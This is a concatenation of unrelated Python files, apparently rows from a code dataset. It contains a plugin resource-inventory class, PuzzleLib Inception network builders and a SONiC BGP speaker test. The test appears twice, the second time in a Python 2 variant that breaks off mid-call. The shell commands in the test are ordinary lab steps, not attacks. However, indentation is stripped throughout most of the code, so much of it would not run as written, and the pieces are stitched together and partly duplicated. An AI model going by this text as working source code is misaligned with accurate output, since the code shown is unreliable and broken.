self._resources = {}
""" Inventory of resources
        :type _resources: dict[str, dict[str, str | datetime.datetime]] """
self._resource_lock = threading.RLock()
""" Lock to sync access to _resources
:type _resource_lock: threading.RLock """
def on_config(self, settings):
"""
Change the settings for the plugin (implement if supported)
:param settings: Settings to update current ones
:type settings: dict
:rtype: None
"""
raise NotImplementedError("Please implement")
def get_data(self):
"""
Get current data of this plugin for frontend (or empty dict if nothing)
(settings, etc.)
:return: Data
:rtype: dict
"""
return {}
def get_info(self):
"""
Get information about this plugin for frontend
(e.g. printable name, description, ..)
:return: Information
:rtype: dict
"""
return {
'name': self.name
}
def resource_get_list(self):
"""
        Get a list of this plugin's resources and a hash to check for file changes
        (it is recommended to keep an in-memory representation of this structure
        rather than generating it on every request)
:return: List of supported resources and hashes
:rtype: list[(unicode, unicode)]
"""
if not self._resources:
return self.resource_update_list()
res = []
with self._resource_lock:
for key in self._resources:
res.append((key, self._resources[key]['hash']))
return res
def resource_update_list(self, reset=False):
"""
        Update the internal resource/hash structure and return the diff
        (Warning: resource names have to be unique!)
        :param reset: Should resources be rebuilt from scratch (default: False)
:type reset: bool
:return: List of resources and hashes that changed
:rtype: list[(unicode, unicode)]
"""
if not self._resource_path:
raise PluginException("No resource path set")
if not os.path.isdir(self._resource_path):
raise PluginException(
u"Resource path directory '{}' not found".format(
self._resource_path
)
)
res = []
with self._resource_lock:
if reset:
self._resources = {}
old = dict(self._resources)
for dirname, dirnames, filenames in os.walk(self._resource_path):
for file_name in filenames:
file_ext = os.path.splitext(file_name)[1].lower()[1:]
if file_ext not in self._resource_file_types:
self.debug(u"Skipping '{}'".format(file_name))
continue
file_path = os.path.join(dirname, file_name)
try:
file_hash = get_file_hash(file_path)
                    except Exception:
self.exception(
u"Failed to hash '{}'".format(file_path)
)
continue
self._resources[file_name] = {
'name': file_name,
'path': file_path,
'hash': file_hash,
'checked': datetime.datetime.utcnow()
}
# generate diff
for key in self._resources:
resource = self._resources[key]
if key not in old or old[key]['hash'] != resource['hash']:
# new file or hash changed
res.append((key, resource['hash']))
return res
def resource_get(self, resource_name):
"""
Return resource info
:param resource_name: Resource name as returned by resource_get_list()
:type resource_name: str
:return: Resource information (empty if not found)
name: Resource name
hash: Resource hash
path: Path to resource
checked: Last time information was updated
:rtype: dict[str, str]
"""
try:
with self._resource_lock:
res = self._resources[resource_name]
except KeyError:
return {}
        return res | paps_settings/settable_plugin.py | 0.678007 | 0.081923 |
import numpy as np
from PuzzleLib.Backend import gpuarray
from PuzzleLib.Containers.Sequential import Sequential
from PuzzleLib.Containers.Parallel import Parallel
from PuzzleLib.Modules.Conv2D import Conv2D
from PuzzleLib.Modules.BatchNorm2D import BatchNorm2D
from PuzzleLib.Modules.Activation import Activation, relu
from PuzzleLib.Modules.MaxPool2D import MaxPool2D
from PuzzleLib.Modules.AvgPool2D import AvgPool2D
from PuzzleLib.Modules.Flatten import Flatten
from PuzzleLib.Modules.Linear import Linear
from PuzzleLib.Modules.SoftMax import SoftMax
from PuzzleLib.Modules.Replicate import Replicate
from PuzzleLib.Modules.Concat import Concat
from PuzzleLib.Modules.ToList import ToList
def loadInceptionBN(modelpath, actInplace=False, bnInplace=False, initscheme="none", name="Inception-BN-0126"):
net = Sequential(name=name)
net.append(Conv2D(3, 64, 7, stride=2, pad=3, useBias=False, initscheme=initscheme, name="conv_1"))
net.append(BatchNorm2D(64, inplace=bnInplace, name="bn_1"))
net.append(Activation(relu, inplace=actInplace, name="relu_1"))
net.append(MaxPool2D(3, 2, pad=1, name="pool_1"))
net.append(Conv2D(64, 64, 1, useBias=False, initscheme=initscheme, name="conv_2_red"))
net.append(BatchNorm2D(64, inplace=bnInplace, name="bn_2_red"))
net.append(Activation(relu, inplace=actInplace, name="relu_2_red"))
net.append(Conv2D(64, 192, 3, pad=1, useBias=False, initscheme=initscheme, name="conv_2"))
net.append(BatchNorm2D(192, inplace=bnInplace, name="bn_2"))
net.append(Activation(relu, inplace=actInplace, name="relu_2"))
net.append(MaxPool2D(3, 2, pad=1, name="pool_2"))
act, bn = actInplace, bnInplace
net.extend(bnBlock(192, [64], [64, 64], [64, 96, 96], [32], act=act, bn=bn, scheme=initscheme, name="3a"))
net.extend(bnBlock(256, [64], [64, 96], [64, 96, 96], [64], act=act, bn=bn, scheme=initscheme, name="3b"))
net.extend(bnShrinkBlock(320, [128, 160], [64, 96, 96], bn=bn, act=act, scheme=initscheme, name="3c"))
net.extend(bnBlock(576, [224], [64, 96], [96, 128, 128], [128], act=act, bn=bn, scheme=initscheme, name="4a"))
net.extend(bnBlock(576, [192], [96, 128], [96, 128, 128], [128], act=act, bn=bn, scheme=initscheme, name="4b"))
	net.extend(bnBlock(576, [160], [128, 160], [128, 160, 160], [128], act=act, bn=bn, scheme=initscheme, name="4c"))
	net.extend(bnBlock(608, [96], [128, 192], [160, 192, 192], [128], act=act, bn=bn, scheme=initscheme, name="4d"))
	net.extend(bnShrinkBlock(608, [128, 192], [192, 256, 256], act=act, bn=bn, scheme=initscheme, name="4e"))
	net.extend(bnBlock(1056, [352], [192, 320], [160, 224, 224], [128], act=act, bn=bn, scheme=initscheme, name="5a"))
	net.extend(bnBlock(1024, [352], [192, 320], [192, 224, 224], [128], act=act, bn=bn, scheme=initscheme, name="5b"))
net.append(AvgPool2D(7, 1, name="global_pool"))
net.append(Flatten(name="flatten"))
net.append(Linear(1024, 1000, initscheme=initscheme, name="fc1"))
net.append(SoftMax(name="softmax"))
if modelpath is not None:
net.load(modelpath, assumeUniqueNames=True)
return net
def loadInceptionV3(modelpath, actInplace=False, bnInplace=False, initscheme="none", name="Inception-7-0001"):
net = Sequential(name=name)
net.append(Conv2D(3, 32, 3, stride=2, useBias=False, initscheme=initscheme, name="conv_conv2d"))
net.append(BatchNorm2D(32, name="conv_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_relu"))
net.append(Conv2D(32, 32, 3, useBias=False, initscheme=initscheme, name="conv_1_conv2d"))
net.append(BatchNorm2D(32, name="conv_1_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_1_relu"))
net.append(Conv2D(32, 64, 3, pad=1, useBias=False, initscheme=initscheme, name="conv_2_conv2d"))
net.append(BatchNorm2D(64, name="conv_2_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_2_relu"))
net.append(MaxPool2D(3, 2, name="pool"))
net.append(Conv2D(64, 80, 1, useBias=False, initscheme=initscheme, name="conv_3_conv2d"))
net.append(BatchNorm2D(80, name="conv_3_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_3_relu"))
net.append(Conv2D(80, 192, 3, useBias=False, initscheme=initscheme, name="conv_4_conv2d"))
net.append(BatchNorm2D(192, name="conv_4_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_4_relu"))
net.append(MaxPool2D(3, 2, name="pool1"))
act, bn = actInplace, bnInplace
net.extend(bnBlock(192, [64], [48, 64], [64, 96, 96], [32], "mixed", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnBlock(256, [64], [48, 64], [64, 96, 96], [64], "mixed_1", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnBlock(288, [64], [48, 64], [64, 96, 96], [64], "mixed_2", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnShrinkBlock(288, [384], [64, 96, 96], "mixed_3", act, bn, initscheme, False, 0, "v3"))
	net.extend(factorBlock(768, [192], [128, 128, 192], [128, 128, 128, 128, 192], [192], "mixed_4", act, bn, initscheme))
	net.extend(factorBlock(768, [192], [160, 160, 192], [160, 160, 160, 160, 192], [192], "mixed_5", act, bn, initscheme))
	net.extend(factorBlock(768, [192], [160, 160, 192], [160, 160, 160, 160, 192], [192], "mixed_6", act, bn, initscheme))
	net.extend(factorBlock(768, [192], [192, 192, 192], [192, 192, 192, 192, 192], [192], "mixed_7", act, bn, initscheme))
net.extend(v3ShrinkBlock(768, [192, 320], [192, 192, 192, 192], "mixed_8", act, bn, initscheme))
net.extend(expandBlock(
1280, [320], [384, 384, 384], [448, 384, 384, 384], [192], "mixed_9", act, bn, initscheme, pool="avg"
))
net.extend(expandBlock(
2048, [320], [384, 384, 384], [448, 384, 384, 384], [192], "mixed_10", act, bn, initscheme, pool="max"
))
net.append(AvgPool2D(8, 1, name="global_pool"))
net.append(Flatten(name="flatten"))
net.append(Linear(2048, 1008, name="fc1"))
net.append(SoftMax(name="softmax"))
if modelpath is not None:
net.load(modelpath, assumeUniqueNames=True)
return net
def convBN(inmaps, outmaps, size, stride, pad, name, actInplace, bnInplace, scheme, typ="bn"):
block = Sequential()
if typ == "bn":
names = ["conv_%s" % name, "bn_%s" % name, "relu_%s" % name]
elif typ == "v3":
names = ["%s_conv2d" % name, "%s_batchnorm" % name, "%s_relu" % name]
else:
raise ValueError("Unrecognized convBN type")
block.append(Conv2D(inmaps, outmaps, size, stride, pad, useBias=False, initscheme=scheme, name=names[0]))
block.append(BatchNorm2D(outmaps, inplace=bnInplace, name=names[1]))
block.append(Activation(relu, inplace=actInplace, name=names[2]))
return block
def pool2D(size, stride, pad, name):
if "max" in name:
return MaxPool2D(size, stride, pad)
elif "avg" in name:
return AvgPool2D(size, stride, pad)
else:
raise ValueError("Unrecognized pool type")
def tower(towername, names, maps, sizes, strides, pads, act, bn, scheme, typ="bn"):
block = Sequential()
lvlnames = ["%s_%s" % (towername, name) for name in names]
for i, name in enumerate(lvlnames):
if "pool" in name:
block.append(pool2D(sizes[i], strides[i], pads[i], name=names[i]))
else:
act = False if i == len(names) - 1 else act
block.extend(convBN(maps[i], maps[i+1], sizes[i], strides[i], pads[i], lvlnames[i], act, bn, scheme, typ))
return block
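# A minimal sketch of how tower() composes convBN stages, using arbitrary example
# maps/sizes with the "bn" naming scheme; not part of the original network definitions.
def exampleTower():
	return tower(
		"demo", ["3x3_reduce", "3x3"], [3, 8, 16], [1, 3], strides=[1, 1], pads=[0, 1],
		act=True, bn=True, scheme="gaussian", typ="bn"
	)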
def bnBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme, b2size=3, b2pad=1, typ="bn"):
block = Sequential()
if typ == "bn":
b1towername, b1names = name, ["1x1"]
b2towername, b2names = name, ["3x3_reduce","3x3"]
b3towername, b3names = name, ["double_3x3_reduce", "double_3x3_0", "double_3x3_1"]
b4towername, b4names = name, ["avg_pool", "proj"]
elif typ == "v3":
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1"]
b3towername, b3names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2"]
b4towername, b4names = "%s_tower_2" % name, ["avg_pool", "conv"]
else:
raise ValueError("Unrecognized block type")
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1], strides=[1], pads=[0], act=act, bn=bn, scheme=scheme, typ=typ
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, b2size], strides=[1, 1], pads=[0, b2pad], act=act, bn=bn,
scheme=scheme, typ=typ
)
branch3 = tower(
b3towername, b3names, [inmaps] + b3m, [1, 3, 3], strides=[1, 1, 1], pads=[0, 1, 1], act=act, bn=bn,
scheme=scheme, typ=typ
)
branch4 = tower(
b4towername, b4names, [inmaps, inmaps] + b4m, [3, 1], strides=[1, 1], pads=[1, 0], act=act, bn=bn,
scheme=scheme, typ=typ
)
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def bnShrinkBlock(inmaps, b1m, b2m, name, act, bn, scheme, b1deep=True, pad=1, typ="bn"):
block = Sequential()
if typ == "bn":
if b1deep:
b1towername, b1names = name, ["3x3_reduce","3x3"]
else:
b1towername, b1names = name, ["3x3"]
b2towername, b2names = name, ["double_3x3_reduce", "double_3x3_0", "double_3x3_1"]
b3towername, b3names = name, ["max_pool"]
elif typ == "v3":
if b1deep:
b1towername, b1names = name, ["conv"]
else:
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1", "conv_2"]
b3towername, b3names = name, ["max_pool"]
else:
raise ValueError("Unrecognized block type")
if b1deep:
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1, 3], [1, 2], [0, pad], act=act, bn=bn, scheme=scheme, typ=typ
)
else:
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [3], [2], [pad], act=act, bn=bn, scheme=scheme, typ=typ
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, 3, 3], [1, 1, 2], [0, 1, pad], act=act, bn=bn, scheme=scheme, typ=typ
)
branch3 = tower(
b3towername, b3names, [inmaps, inmaps], [3], [2], [pad], act=act, bn=bn, scheme=scheme, typ=typ
)
block.append(Replicate(times=3))
block.append(Parallel().append(branch1).append(branch2).append(branch3))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def factorBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme):
block = Sequential()
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1", "conv_2"]
b3towername, b3names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2", "conv_3", "conv_4"]
b4towername, b4names = "%s_tower_2" % name, ["avg_pool", "conv"]
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, (1, 7), (7, 1)], [1, 1, 1], [0, (0, 3), (3, 0)], act=act, bn=bn,
scheme=scheme, typ="v3"
)
branch3 = tower(
b3towername, b3names, [inmaps] + b3m, [1, (7, 1), (1, 7), (7, 1), (1, 7)], [1, 1, 1, 1, 1],
[0, (3, 0), (0, 3), (3, 0), (0, 3)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch4 = tower(
b4towername, b4names, [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn, scheme=scheme, typ="v3"
)
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def v3ShrinkBlock(inmaps, b1m, b2m, name, act, bn, scheme):
block = Sequential()
b1towername, b1names = "%s_tower" % name, ["conv", "conv_1"]
b2towername, b2names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2", "conv_3"]
b3towername, b3names = name, ["max_pool"]
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1, 3], [1, 2], [0, 0], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, (1, 7), (7, 1), 3], [1, 1, 1, 2], [0, (0, 3), (3, 0), 0],
act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3 = tower(b3towername, b3names, [inmaps, inmaps], [3], [2], [0], act=act, bn=bn, scheme=scheme, typ="v3")
block.append(Replicate(times=3))
block.append(Parallel().append(branch1).append(branch2).append(branch3))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def expandBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme, pool="avg"):
block = Sequential()
b1towername, b1names = name, ["conv"]
b2towername, b2names, b2sub1names, b2sub2names = "%s_tower" % name, ["conv"], ["mixed_conv"], ["mixed_conv_1"]
	b3towername, b3names, b3sub1names, b3sub2names = "%s_tower_1" % name, ["conv", "conv_1"], ["mixed_conv"], ["mixed_conv_1"]
branch1 = tower(b1towername, b1names, [inmaps] + b1m, [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3")
branch2 = tower(b2towername, b2names, [inmaps, b2m[0]], [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3")
branch2sub1 = tower(
b2towername, b2sub1names, [b2m[0], b2m[1]], [(1, 3)], [1], [(0, 1)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2sub2 = tower(
b2towername, b2sub2names, [b2m[0], b2m[2]], [(3, 1)], [1], [(1, 0)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2.append(Replicate(times=2))
branch2.append(Parallel().append(branch2sub1).append(branch2sub2))
branch3 = tower(
b3towername, b3names, [inmaps, b3m[0], b3m[1]], [1, 3], [1, 1], [0, 1], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3sub1 = tower(
b3towername, b3sub1names, [b3m[1], b3m[2]], [(1, 3)], [1], [(0, 1)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3sub2 = tower(
b3towername, b3sub2names, [b3m[1], b3m[3]], [(3, 1)], [1], [(1, 0)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3.append(Replicate(times=2))
branch3.append(Parallel().append(branch3sub1).append(branch3sub2))
if pool == "avg":
branch4 = tower(
"%s_tower_2" % name, ["avg_pool", "conv"], [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn,
scheme=scheme, typ="v3"
)
elif pool == "max":
branch4 = tower(
"%s_tower_2" % name, ["max_pool", "conv"], [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn,
scheme=scheme, typ="v3"
)
else:
raise ValueError("Unrecognized block type")
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(ToList())
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def unittest():
bn = loadInceptionBN(None, initscheme="gaussian")
data = gpuarray.to_gpu(np.random.randn(1, 3, 224, 224).astype(np.float32))
bn(data)
del bn
gpuarray.memoryPool.freeHeld()
v3 = loadInceptionV3(None, initscheme="gaussian")
data = gpuarray.to_gpu(np.random.randn(1, 3, 299, 299).astype(np.float32))
v3(data)
del v3
gpuarray.memoryPool.freeHeld()
if __name__ == "__main__":
	unittest() | Models/Nets/Inception.py | 0.489259 | 0.316554 |
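For reference, a minimal inference sketch in the spirit of unittest() above; the import path is assumed from the repo layout (Models/Nets/Inception.py under the PuzzleLib package), and the .get() call that copies the result back to host memory is an assumption about the gpuarray API rather than something shown in this file.

import numpy as np
from PuzzleLib.Backend import gpuarray
from PuzzleLib.Models.Nets.Inception import loadInceptionBN

net = loadInceptionBN(None, initscheme="gaussian")  # random weights, no checkpoint file
batch = gpuarray.to_gpu(np.random.randn(2, 3, 224, 224).astype(np.float32))
probs = net(batch)
print(np.argmax(probs.get(), axis=1))  # assumed: .get() copies the result to a numpy array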
import pytest
from netaddr import IPAddress, IPNetwork
import sys
import time
import ipaddress
from ansible_host import AnsibleHost
from ptf_runner import ptf_runner
def generate_ips(num, prefix, exclude_ips):
"""
    Generate ips within prefix (the first available addresses, skipping exclude_ips)
"""
prefix = IPNetwork(prefix)
exclude_ips.append(prefix.broadcast)
exclude_ips.append(prefix.network)
available_ips = list(prefix)
    if len(available_ips) - len(exclude_ips) < num:
raise Exception("Not enough available IPs")
generated_ips = []
for available_ip in available_ips:
if available_ip not in exclude_ips:
generated_ips.append(IPNetwork(str(available_ip) + '/' + str(prefix.prefixlen)))
if len(generated_ips) == num:
break
return generated_ips
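# A minimal sketch of the generate_ips() contract (not collected by pytest), assuming a
# hypothetical /24 prefix and an excluded gateway address.
def _example_generate_ips():
    gateway = IPAddress('192.168.0.1')
    hosts = generate_ips(3, '192.168.0.0/24', [gateway])
    # -> the first three usable addresses (network, broadcast and gateway excluded),
    #    each returned as an IPNetwork carrying the /24 prefix length
    return [str(ip) for ip in hosts]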
@pytest.mark.parametrize(
"ipv4, ipv6, mtu",
[ pytest.param(True, False, 1514), ],
)
def test_bgp_speaker(localhost, ansible_adhoc, testbed, ipv4, ipv6, mtu):
"""setup bgp speaker on T0 topology and verify routes advertised
by bgp speaker is received by T0 TOR
"""
hostname = testbed['dut']
ptf_hostname = testbed['ptf']
host = AnsibleHost(ansible_adhoc, hostname)
ptfhost = AnsibleHost(ansible_adhoc, ptf_hostname)
mg_facts = host.minigraph_facts(host=hostname)['ansible_facts']
host_facts = host.setup()['ansible_facts']
res = host.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
vlan_ips = generate_ips(3, \
"%s/%s" % (mg_facts['minigraph_vlan_interfaces'][0]['addr'], mg_facts['minigraph_vlan_interfaces'][0]['prefixlen']),
[IPAddress(mg_facts['minigraph_vlan_interfaces'][0]['addr'])])
# three speaker ips, two from peer range, another is vlan ip [0]
speaker_ips = generate_ips(2, mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0], [])
speaker_ips.append(vlan_ips[0])
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
host.command("ip route add %s/32 dev %s" % (ip.ip, mg_facts['minigraph_vlan_interfaces'][0]['attachto']))
root_dir = "/root"
exabgp_dir = "/root/exabgp"
helper_dir = "/root/helpers"
port_num = [5000, 6000, 7000]
cfnames = ["config_1.ini", "config_2.ini", "config_3.ini"]
vlan_ports = []
for i in range(0, 3):
vlan_ports.append(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][i]])
ptfhost.file(path=exabgp_dir, state="directory")
ptfhost.file(path=helper_dir, state="directory")
ptfhost.copy(src="bgp_speaker/dump.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/http_api.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/announce_routes.py", dest=helper_dir)
# deploy config file
extra_vars = \
{ 'helper_dir': helper_dir,
'exabgp_dir': exabgp_dir,
'lo_addr' : mg_facts['minigraph_lo_interfaces'][0]['addr'],
'lo_addr_prefixlen' : mg_facts['minigraph_lo_interfaces'][0]['prefixlen'],
'vlan_addr' : mg_facts['minigraph_vlan_interfaces'][0]['addr'],
'peer_range': mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0],
'announce_prefix': '10.10.10.0/26',
'minigraph_portchannels' : mg_facts['minigraph_portchannels'],
'minigraph_vlans' : mg_facts['minigraph_vlans'],
'minigraph_port_indices' : mg_facts['minigraph_port_indices'],
          'peer_asn' : mg_facts['minigraph_bgp_asn'],
'my_asn' : bgp_speaker_asn,
'vlan_ports' : vlan_ports,
'port_num' : port_num,
'speaker_ips': [str(ip) for ip in speaker_ips],
'vlan_ips': [str(ip) for ip in vlan_ips],
'cfnames': cfnames }
for i in range(0, 3):
extra_vars.update({ 'cidx':i })
extra_vars.update({ 'speaker_ip': str(speaker_ips[i].ip) })
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, cfnames[i]))
# deploy routes
ptfhost.template(src="bgp_speaker/routes.j2", dest="%s/%s" % (exabgp_dir, "routes"))
# deploy start script
ptfhost.template(src="bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, "start.sh"), mode="u+rwx")
# kill exabgp
res = ptfhost.shell("pkill exabgp || true")
    print(res)
# start exabgp instance
res = ptfhost.shell("bash %s/start.sh" % exabgp_dir)
    print(res)
time.sleep(10)
# announce route
res = ptfhost.shell("nohup python %s/announce_routes.py %s/routes >/dev/null 2>&1 &" % (helper_dir, exabgp_dir))
    print(res)
# make sure routes announced to dynamic bgp neighbors
time.sleep(60)
bgp_facts = host.bgp_facts()['ansible_facts']
# Verify bgp sessions are established
for k, v in bgp_facts['bgp_neighbors'].items():
assert v['state'] == 'established'
# Verify accepted prefixes of the dynamic neighbors are correct
for ip in speaker_ips:
assert bgp_facts['bgp_neighbors'][str(ip.ip)]['accepted prefixes'] == 1
assert bgp_facts['bgp_neighbors'][str(vlan_ips[0].ip)]['accepted prefixes'] == 1
# Generate route-port map information
ptfhost.template(src="bgp_speaker/bgp_speaker_route.j2", dest="/root/bgp_speaker_route.txt")
ptfhost.copy(src="ptftests", dest=root_dir)
ptf_runner(ptfhost, \
"ptftests",
"fib_test.FibTest",
platform_dir="ptftests",
params={"testbed_type": "t0",
"router_mac": host_facts['ansible_Ethernet0']['macaddress'],
"fib_info": "/root/bgp_speaker_route.txt",
"ipv4": ipv4,
"ipv6": ipv6,
"testbed_mtu": mtu },
log_file="/tmp/bgp_speaker_test.FibTest.log",
socket_recv_size=16384)
res = ptfhost.shell("pkill exabgp || true")
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
ptfhost.shell("ip addr flush dev eth{}".format(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][0]])) | tests/test_bgp_speaker.py | import pytest
from netaddr import *
import sys
import time
import ipaddress
from ansible_host import AnsibleHost
from ptf_runner import ptf_runner
def generate_ips(num, prefix, exclude_ips):
"""
Generate random ips within prefix
"""
prefix = IPNetwork(prefix)
exclude_ips.append(prefix.broadcast)
exclude_ips.append(prefix.network)
available_ips = list(prefix)
if len(available_ips) - len(exclude_ips)< num:
raise Exception("Not enough available IPs")
generated_ips = []
for available_ip in available_ips:
if available_ip not in exclude_ips:
generated_ips.append(IPNetwork(str(available_ip) + '/' + str(prefix.prefixlen)))
if len(generated_ips) == num:
break
return generated_ips
@pytest.mark.parametrize(
"ipv4, ipv6, mtu",
[ pytest.param(True, False, 1514), ],
)
def test_bgp_speaker(localhost, ansible_adhoc, testbed, ipv4, ipv6, mtu):
"""setup bgp speaker on T0 topology and verify routes advertised
by bgp speaker is received by T0 TOR
"""
hostname = testbed['dut']
ptf_hostname = testbed['ptf']
host = AnsibleHost(ansible_adhoc, hostname)
ptfhost = AnsibleHost(ansible_adhoc, ptf_hostname)
mg_facts = host.minigraph_facts(host=hostname)['ansible_facts']
host_facts = host.setup()['ansible_facts']
res = host.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
vlan_ips = generate_ips(3, \
"%s/%s" % (mg_facts['minigraph_vlan_interfaces'][0]['addr'], mg_facts['minigraph_vlan_interfaces'][0]['prefixlen']),
[IPAddress(mg_facts['minigraph_vlan_interfaces'][0]['addr'])])
# three speaker ips, two from peer range, another is vlan ip [0]
speaker_ips = generate_ips(2, mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0], [])
speaker_ips.append(vlan_ips[0])
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
host.command("ip route add %s/32 dev %s" % (ip.ip, mg_facts['minigraph_vlan_interfaces'][0]['attachto']))
root_dir = "/root"
exabgp_dir = "/root/exabgp"
helper_dir = "/root/helpers"
port_num = [5000, 6000, 7000]
cfnames = ["config_1.ini", "config_2.ini", "config_3.ini"]
vlan_ports = []
for i in range(0, 3):
vlan_ports.append(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][i]])
ptfhost.file(path=exabgp_dir, state="directory")
ptfhost.file(path=helper_dir, state="directory")
ptfhost.copy(src="bgp_speaker/dump.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/http_api.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/announce_routes.py", dest=helper_dir)
# deploy config file
extra_vars = \
{ 'helper_dir': helper_dir,
'exabgp_dir': exabgp_dir,
'lo_addr' : mg_facts['minigraph_lo_interfaces'][0]['addr'],
'lo_addr_prefixlen' : mg_facts['minigraph_lo_interfaces'][0]['prefixlen'],
'vlan_addr' : mg_facts['minigraph_vlan_interfaces'][0]['addr'],
'peer_range': mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0],
'announce_prefix': '10.10.10.0/26',
'minigraph_portchannels' : mg_facts['minigraph_portchannels'],
'minigraph_vlans' : mg_facts['minigraph_vlans'],
'minigraph_port_indices' : mg_facts['minigraph_port_indices'],
'peer_asn' : mg_facts['minigraph_bgp_asn'],
'peer_asn' : mg_facts['minigraph_bgp_asn'],
'my_asn' : bgp_speaker_asn,
'vlan_ports' : vlan_ports,
'port_num' : port_num,
'speaker_ips': [str(ip) for ip in speaker_ips],
'vlan_ips': [str(ip) for ip in vlan_ips],
'cfnames': cfnames }
for i in range(0, 3):
extra_vars.update({ 'cidx':i })
extra_vars.update({ 'speaker_ip': str(speaker_ips[i].ip) })
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, cfnames[i]))
# deploy routes
ptfhost.template(src="bgp_speaker/routes.j2", dest="%s/%s" % (exabgp_dir, "routes"))
# deploy start script
ptfhost.template(src="bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, "start.sh"), mode="u+rwx")
# kill exabgp
res = ptfhost.shell("pkill exabgp || true")
print res
# start exabgp instance
res = ptfhost.shell("bash %s/start.sh" % exabgp_dir)
print res
time.sleep(10)
# announce route
res = ptfhost.shell("nohup python %s/announce_routes.py %s/routes >/dev/null 2>&1 &" % (helper_dir, exabgp_dir))
print res
# make sure routes announced to dynamic bgp neighbors
time.sleep(60)
bgp_facts = host.bgp_facts()['ansible_facts']
# Verify bgp sessions are established
for k, v in bgp_facts['bgp_neighbors'].items():
assert v['state'] == 'established'
# Verify accepted prefixes of the dynamic neighbors are correct
for ip in speaker_ips:
assert bgp_facts['bgp_neighbors'][str(ip.ip)]['accepted prefixes'] == 1
assert bgp_facts['bgp_neighbors'][str(vlan_ips[0].ip)]['accepted prefixes'] == 1
# Generate route-port map information
ptfhost.template(src="bgp_speaker/bgp_speaker_route.j2", dest="/root/bgp_speaker_route.txt")
ptfhost.copy(src="ptftests", dest=root_dir)
ptf_runner(ptfhost, \
"ptftests",
"fib_test.FibTest",
platform_dir="ptftests",
params={"testbed_type": "t0",
